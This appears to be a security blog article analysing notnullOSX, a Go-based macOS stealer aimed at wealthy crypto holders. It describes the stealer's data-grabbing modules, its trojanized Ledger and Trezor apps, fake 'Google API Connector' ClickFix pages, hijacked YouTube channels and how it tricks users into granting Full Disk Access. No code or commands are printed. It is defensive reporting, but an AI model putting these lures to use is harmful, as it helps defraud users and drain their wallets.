notnullOSX Malware: High-Value Crypto Wallets at Risk

The cryptocurrency landscape has long been a digital Wild West, but as we move deeper into 2026, the outlaws are becoming significantly more sophisticated. The era of “spray and pray” malware, where threat actors cast wide nets hoping to catch any available data, is being eclipsed by surgical, high-yield operations. At the forefront of this evolution is notnullOSX malware, a specialized information stealer written in Go that represents a paradigm shift in how macOS systems are compromised. Unlike its predecessors, which sought to infect as many machines as possible, notnullOSX is governed by a strict “quality over quantity” ethos, specifically engineered to hunt individuals with cryptocurrency holdings exceeding $10,000.

The Genesis of notnullOSX: The Return of alh1mik

The emergence of the notnullOSX malware is not merely a technical event; it is the culmination of a long-standing narrative within the cybercrime underground. The developer behind the threat, known as alh1mik, was previously a prominent figure under the alias 0xFFF. In 2023, 0xFFF famously vanished from high-profile hacking forums following a public dispute and a fabricated law enforcement tip that led to a “rage-quit” of the community.

By August 2024, the actor re-emerged under the moniker alh1mik, offering an apology to the forum administrators and a promise: the development of a premier, modular macOS stealer that would surpass the capabilities of the then-dominant Atomic macOS Stealer (AMOS). After nearly two years of refined development and paying close attention to the evolving macOS security landscape, alh1mik delivered notnullOSX in early 2026. Initially detected by researchers at Moonlock Lab on March 30, 2026, the malware quickly established a footprint in Vietnam, Taiwan, and Spain, signaling a targeted rollout of what is now considered one of the most dangerous threats to the macOS ecosystem.

Surgical Precision: The $10,000 Threshold

What distinguishes notnullOSX malware from standard infostealers is its administrative gatekeeping. The malware is distributed through an affiliate panel where operators must manually pre-screen their targets. Before an infection chain is even initiated, operators are required to submit a dossier on the potential victim, including:

• Verified cryptocurrency wallet balances.
• Social media profiles (LinkedIn, X, Telegram).
• Correspondence history or professional background.
• Geographic location.

The affiliate system automatically rejects any target whose verifiable assets fall below the $10,000 USD threshold. This strategic decision reduces the noise generated by the malware, making it less likely to be flagged by broad-spectrum security telemetry and ensuring that every successful infection yields a high return on investment (ROI). For the threat actor, it is a matter of resource management; for the victim, it is a terrifying realization that they were specifically selected for their wealth.

Technical Anatomy: A Modular Go-Based Powerhouse

The notnullOSX malware is written in Golang (Go), a choice that provides several advantages to the developer. Go’s ability to compile into a single, static binary makes it difficult for traditional antivirus solutions to perform signature-based detection, as the resulting code is often bulky and structurally unique compared to C++ or Python-based threats.

Modular Architecture and Command-and-Control (C2)

The malware operates through a highly modular framework. Upon initial execution, the core “dropper” establishes a persistent connection with its C2 server. Instead of carrying all its malicious payloads at once—which would increase the risk of detection—notnullOSX downloads specific modules based on the environment it finds itself in. Confirmed modules include:

• iMessageGrab: Scans and exfiltrates the chat.db database, allowing attackers to search for private keys or recovery phrases shared in messages.
• AppleNotesGrab: Extracts data from the macOS Notes app, a common repository for users to store passwords or seed phrases.
• BrowserGrab: Targets Safari, Chrome, and Firefox to harvest cookies, saved credentials, and autofill data.
• CryptoWalletsGrab: Specifically targets local files for Bitcoin Core, Exodus, Electrum, and MetaMask.

The ReplaceApp Module: The Ultimate Hardware Wallet Threat

Perhaps the most sophisticated component of the notnullOSX malware is the ReplaceApp module. This feature is designed to circumvent the security of hardware wallets like Ledger and Trezor. Because the private keys of a hardware wallet never leave the device, they are theoretically immune to traditional software stealers.

The ReplaceApp module bypasses this by silently swapping the legitimate Ledger Live or Trezor Suite applications with trojanized versions. When a user opens what they believe to be their official wallet software, they are presented with a perfectly replicated interface. If the user attempts to “restore” their wallet or perform an update, the fake app prompts them to enter their 24-word seed phrase. Once entered, the phrase is exfiltrated in real-time, giving the attacker full control over the funds stored on the physical device.

Multi-Layered Social Engineering: The “ClickFix” Trap

The delivery of notnullOSX malware relies on psychological manipulation rather than zero-day vulnerabilities. The primary infection vector is a sophisticated “ClickFix” campaign that exploits the trust users place in familiar platforms like Google and YouTube.

The Fake “Google API Connector”

Victims often receive a link to a “protected” Google Document. When the page loads, it displays a convincing error message stating that the document cannot be decrypted because the “Google API Connector” is out of date. To “fix” the error, the user is presented with two options:

1. The Terminal Path: The user is instructed to copy a Base64-encoded command and paste it into their macOS Terminal. This command uses osascript to download and execute a remote bash script that installs the malware.
2. The DMG Path: The user downloads a disk image file (DMG) that appears to be a legitimate installer but actually contains the modular stealer.

Hijacked YouTube Channels and WallSpace.app

To further bolster the perceived legitimacy of the software, alh1mik’s team utilizes hijacked YouTube channels. In one documented instance, a channel with over 10 years of history and 50,000 subscribers was used to promote a fake live wallpaper application called WallSpace. The high view counts and the age of the channel provide a false sense of security, leading users to download the malicious DMG from the video’s description. Once installed, the malware requests Full Disk Access (FDA) under the guise of needing permission to set the live wallpaper, effectively giving the attacker unrestricted access to the entire file system.

The TCC Bypass: Defeating Apple’s Security Framework

Apple’s macOS relies on the Transparency, Consent, and Control (TCC) framework to protect sensitive user data. Normally, an app attempting to access iMessages or Safari cookies would trigger a system pop-up asking for permission. notnullOSX malware avoids these alerts by tricking the user into granting Full Disk Access during the initial installation process.

By securing FDA, the malware bypasses the TCC gatekeeper entirely. It can then silently read protected directories like ~/Library/Messages and ~/Library/Safari without the user ever seeing another security prompt. This demonstrates a clear understanding of the macOS permission model; the attackers know that if they can convince a user to perform one “trusted” action during setup, they can operate in total silence thereafter.

Conclusion: A New Era of Digital Extortion

The emergence of notnullOSX malware marks a turning point in the threat landscape for macOS and cryptocurrency users alike. By moving away from broad, automated attacks and toward manual, high-value targeting, the actor alh1mik has created a sustainable and highly profitable model for digital theft. The combination of Go-based modularity, hijacked social proof, and the terrifying ReplaceApp module makes this one of the most effective stealers ever witnessed in the wild.

For high-net-worth individuals and crypto professionals, the lesson is clear: technical security measures like hardware wallets are only as strong as the software used to manage them. Staying safe in the age of notnullOSX requires a rigorous “zero-trust” approach to every Terminal command, every “protected” document, and every third-party application, no matter how legitimate its origin may appear.